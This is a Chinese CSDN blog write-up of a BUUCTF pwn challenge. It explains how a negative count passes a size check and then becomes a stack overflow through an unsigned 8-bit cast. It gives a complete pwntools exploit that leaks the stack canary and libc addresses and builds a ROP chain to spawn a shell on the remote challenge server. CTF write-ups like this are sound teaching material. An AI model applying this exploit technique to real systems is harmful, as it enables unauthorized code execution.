[BUUCTF-pwn] bssidessf_ctf_2020_adding_machine

最新推荐文章于 2023-04-13 19:12:16 发布
最新推荐文章于 2023-04-13 19:12:16 发布
阅读量448 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122328301
版权

难度不大,要求输入n个数,但栈空间只能放127个数,要求输入数<127但可以输入负数,其它地址在输入debug时可以全部得到。

这里由于没有中途退出机制,需要精确的输入一个负数表示执行次数

  v6 = get_long("Number of numbers to add");
  if ( v6 <= 127 )
  {
    get_data(v8, (unsigned __int8)v6);          // 输入负数里,在这里用int8转成正数
    v7 = add_nums(v8, (unsigned __int8)v6);
    printf("Total is %ld\n", v7);
    result = 0;
  }

负数表示的次数为 n-256 这里需要输入133个,输入数字为133-256=-123

然后输入padding,canary,rbp,pop_rdi+1,pop_rdi,bin_sh,system

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

def connect():
    global p,libc_elf,one,libc_start_main_ret,local
    
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 28595) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

def pwn():

    p.sendlineafter(b'Number of numbers to add> ', '-123')
    p.sendlineafter(b'> ', b'debug')
    p.recvuntil(b'@ ')
    pwn_base = int(p.recvline(), 16) - elf.sym['main']
    p.recvuntil(b'@ ')
    libc_base = int(p.recvline(), 16) - libc_elf.sym['printf']
    p.recvuntil(b'RBP is ')
    rbp_addr  = int(p.recvline(), 16)
    canary_addr = hex(rbp_addr -0x10).encode()
    
    while True:
        v = p.readline()
        if canary_addr in v:
            canary = u64(bytes.fromhex((v[42:65].replace(b' ',b'')).decode() ))
            print('canary:', hex(canary))
            break
    
    print(hex(pwn_base), hex(libc_base), hex(canary))
    libc_elf.address = libc_base
    pop_rdi = next(libc_elf.search(asm('pop rdi; ret')))
    bin_sh  = next(libc_elf.search(b'/bin/sh'))
    system  = libc_elf.sym['system']
    
    for i in range(127):
        p.sendlineafter(b'> ', b'0')
    
    p.sendlineafter(b'> ', str(canary).encode())
    p.sendlineafter(b'> ', b'0')
    p.sendlineafter(b'> ', str(pop_rdi+1).encode())
    p.sendlineafter(b'> ', str(pop_rdi).encode())
    p.sendlineafter(b'> ', str(bin_sh).encode())
    p.sendlineafter(b'> ', str(system).encode())
    #p.sendlineafter(b'> ', b'0')
    
    p.sendlineafter(b'\n', b'cat /flag')
    p.interactive()

connect()
pwn()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 936
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
crypto-haystack(BSidesSF ctf 2020)
耐酸碱高温固化材料近距离传输研究
12-16 484
re和crypto结合的一题,记录一下。大概的意思是本题是关于某种签名算法。另外题目还提供了一个pcap抓包文件,里面有两个tcp流,将比较大的流内容二进制stream.raw保存下来待用。wireshark保存raw数据的方法。
ctf misc 文件(下)
qq_61988806的博客
09-09 1387
ctf misc
CTF解题-2020年强网杯参赛WriteUp
道阻且长,行则将至。
08-29 8814
前言 2020年8月22日9:00 - 8月23日21:00,参加(划水)了历时36小时的第四届“强网杯”全国网络安全竞赛线上赛。 第一次参加CTF比赛,不可思议(成功傍大佬)地从1800+支队伍中以前10%的排名获得“优胜奖”(成功参与奖),故骄傲(厚脸皮)地记录下比赛wp…… 强网先锋 主动 1、进入网址,给出后台php源码,发现是个代码审计的题: 2、通过参数拼接命令,发现存在任意命令执行漏洞: 3、进一步查看本路径下的文件: 后台但是过滤了flag关键字,无法直接读取,那么就需要想办法绕过
[MRCTF2020]Ezpop—序列化pop链
weixin_43952190的博客
05-09 6648
Ezpop 序列化Pop链 利用几个类之间相互关联进行构造 文件包含漏洞 Modifier类中append函数使用了include(),会出现文件包含漏洞。 以下是题目内容: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%
逆向BSides SF CTF之flagstore.apk
公众号shadow sock7
08-21 2579
看有一个writeup写了个装drozer, 然后尝试了一下并没有成功。感觉虽然功能不错,但是有点麻烦。然后 参考: https://ctf.rip/bsides-sf-ctf-2017-flag-receiver-mobile-reverse-engineering/ https://russtone.io/2017/02/14/bssidessf-2017-flagreceiver/在Ma
BUUCTF-PWN-test_your_nc
m0_64180167的博客
04-11 208
有了这个代码 我们的权限就会得到提升,我们就能够查看电脑上的其他文件,获取flag。可以把它理解为一把开启flag宝箱的钥匙。pwn 是为了能够得到最高权限的目的 pwn掉服务器 我们就能获得最高权限 来控制电脑。得到信息 我们把文件放入 ida64。很轻松的就能使用代码ls 来展示文件。得到 文件 与 ip 端口。从这道题我们能理解PWN。并且我们发现flag。
BUUCTF-Pwn-bjdctf_2020_babyrop
餐桌上的猫
03-25 363
exp from pwn import* from LibcSearcher import * p=process('/home/lhb/桌面/bjdctf_2020_babyrop') elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop') p=remote('node4.buuoj.cn',27346) main=0x4006ad pop_rdi_ret=0x400733 puts_plt=elf.plt['puts'] puts_got=elf.got['puts']
BUUCTF-PWN-pwn1_sctf_2016
m0_64180167的博客
04-13 540
就刚刚好满足了get的溢出 然后再输入4个垃圾字符 就可以 实现函数返回 再将 get flag返回地址填入即可。因为you占3字节 我们只能输入 32个 一个i =三个字节 所以我们输入 20个I 就可以占 60 字节。原本看别人的博客 是说replace函数替换了 但是 我看不明白 很简单的办法。然后进行发现是32 所以我们记住 如果栈溢出漏洞 我们需要4个字节填满基地址。发现get 但是只能输入 32个 所以无法实现栈溢出。发现进行了替换 这样我们就可以执行栈溢出。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CTFd-master_roseosy_ctf_
09-30
- **比赛管理**:CTFd 允许管理员创建不同类型的题目,包括但不限于 Web、Crypto、ReversingPwn 等,并设置分数和解题规则。 - **用户注册与管理**:用户可以注册参赛,管理员可以管理用户权限,查看用户得分和...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
开题报告宠物医院管理系统的设计与实现 已通过开题答辩的.docx
07-25
随着人们生活水平的提高和精神需求的增加,宠物已经成为很多家庭的重要成员,宠物市场的规模和潜力也不断扩大。宠物医院作为宠物健康保障的重要机构,需要适应市场的发展和变化,提供更加专业和便捷的服务。宠物医院的业务和信息涉及多个方面,如科室信息、医生信息、坐诊信息、药品信息、挂号信息、网站公告信息等。如果采用传统的手工或半自动化的管理方式,会造成信息的分散、混乱、更新困难、查询不便等问题,影响管理的效率和质量。系统能够通过计算机技术和网络技术对宠物医院业务进行集中管理。它可以实现信息的录入、存储、查询、修改、删除、统计、分析、展示等功能,方便宠物医院的管理人员和工作人员进行业务操作和决策支持。宠物医院管理系统还可以利用网络技术,向宠物主人和宠物爱好者提供在线的服务和咨询,方便宠物主人和宠物爱好者了解和关爱自己的宠物,增强宠物医院的社会影响力和竞争力。综上所述,宠物医院管理系统是一个具有实际意义和应用价值的选题,它可以为宠物医院的管理和服务提供有效的支持,为宠物主人和宠物爱好者提供便捷的服务和咨询,为宠物的健康和福利做出贡献。
主成分分析算法Python代码.txt
最新发布
07-25
数学建模模型python实例。
Linux环境安装Redis 6.2.9
07-25
Linux环境安装Redis 6.2.9
b107校园悬赏任务平台-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-25
校园悬赏任务平台对字典管理、论坛管理、任务资讯任务资讯公告管理、接取用户管理、任务管理、任务咨询管理、任务收藏管理、任务评价管理、任务订单管理、发布用户管理、管理员管理等进行集中化处理。经过前面自己查阅的网络知识,加上自己在学校课堂上学习的知识,决定开发系统选择小程序模式这种高效率的模式完成系统功能开发。这种模式让操作员基于浏览器的方式进行网站访问,采用的主流的Java语言这种面向对象的语言进行校园悬赏任务平台程序的开发,在数据库的选择上面,选择功能强大的Mysql数据库进行数据的存放操作。校园悬赏任务平台的开发让用户查看任务信息变得容易,让管理员高效管理任务信息。 校园悬赏任务平台具有管理员角色,用户角色,这几个操作权限。 校园悬赏任务平台针对管理员设置的功能有:添加并管理各种类型信息,管理用户账户信息,管理任务信息,管理任务资讯公告信息等内容。 校园悬赏任务平台针对用户设置的功能有:查看并修改个人信息,查看任务信息,查看任务资讯公告信息等内容。 系统登录功能是程序必不可少的功能,在登录页面必填的数据有两项,一项就是账号,另一项数据就是密码,当管理员正确填写并提交这二者数据之后,管理员就可以进入系统后台功能操作区。项目管理页面提供的功能操作有:查看任务,删除任务操作,新增任务操作,修改任务操作。任务资讯公告信息管理页面提供的功能操作有:新增任务资讯公告,修改任务资讯公告,删除任务资讯公告操作。任务资讯公告类型管理页面显示所有任务资讯公告类型,在此页面既可以让管理员添加新的任务资讯公告信息类型,也能对已有的任务资讯公告类型信息执行编辑更新,失效的任务资讯公告类型信息也能让管理员快速删除。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值